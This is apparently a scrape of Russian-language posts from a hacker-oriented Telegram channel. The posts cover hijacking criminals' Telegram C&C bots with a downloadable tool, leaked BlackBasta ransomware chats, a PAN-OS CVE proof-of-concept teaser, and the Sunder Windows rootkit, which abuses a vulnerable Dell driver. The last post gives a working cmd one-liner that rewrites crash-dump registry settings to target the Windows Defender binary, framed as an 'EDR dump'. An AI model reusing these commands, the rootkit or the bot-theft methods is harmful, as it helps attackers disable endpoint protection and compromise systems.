Publicaciones de Telegram de Proxy Bar

Украсть у Бота !
Помните админы каналов всегда боялись добавлять в чЯты ботов ?
Правильно боялись (ID рано или поздно всплывет, или набрутят или etc).
Но ладно если просто антирекламный бот в открытом чате, а если это Ransom BOT или LOGS BOT
или Zabbix BOT лол да)))
Телега давно у черношляпников как C&C сервер используется.
Так вот, перехватом ботов занимаются ВСЕ, менты ловят злых шляп, злые шляпы ловят хомяков и получают удобоваримый лог в телегу, более ленивые черные шляпы ловят в подворотне ботов первых шляп, копипастят логи и имеют свой сладкий шекель.
*
Ну так вот, тут один threat hunter имел неосторожность написать софтину, которая автоматизирует большую часть процесса, ты только парсить логи успевай !
*
В ролике все наглядно
*
DownLoad Thы soft (x_)

#telegram #steal #bots #logs

BlackBasta Chat Logs
*
У ransomВарщиков протек matrix сервак

Вот вам и лол
*
LOLC2

Analysis of a TCP subsystem Linux vulnerability

CVE-2025-0108 Palo Alto Networks PAN-OS
*
POC exploit

onliner

curl -s https://URL | grep -Po "(\/)((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0-9\{\}]+))" | sort -u

Извините))))

опа

Sunder
*
Это Windows Rootkit на основе Fudmodule Rootkit от Lazarus Group. Ссылка на эту версию Sunder для примера эксплойта драйвера Appid.sys
Уязвимый драйвер Сандера в этой репе GitHub является драйвер Dell dbutil_2_3.sys ( драйвер заблокирован Microsoft).
Сначала нужно разлочить драйвер (см описание в репе)
Sunder Rootkit

EDR dump (for fun разумеется)

cmd /v/c "set R=reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /f /v&!R! CrashDumpEnabled /d 7 /t 4&!R! DumpFileSize /d 666 /t 4&for /f "delims=*" %i in ('sc qc WinDefend^|find "PATH_"')do (set t=%i&!R! DedicatedDumpFile /d !t:~29,-1!)"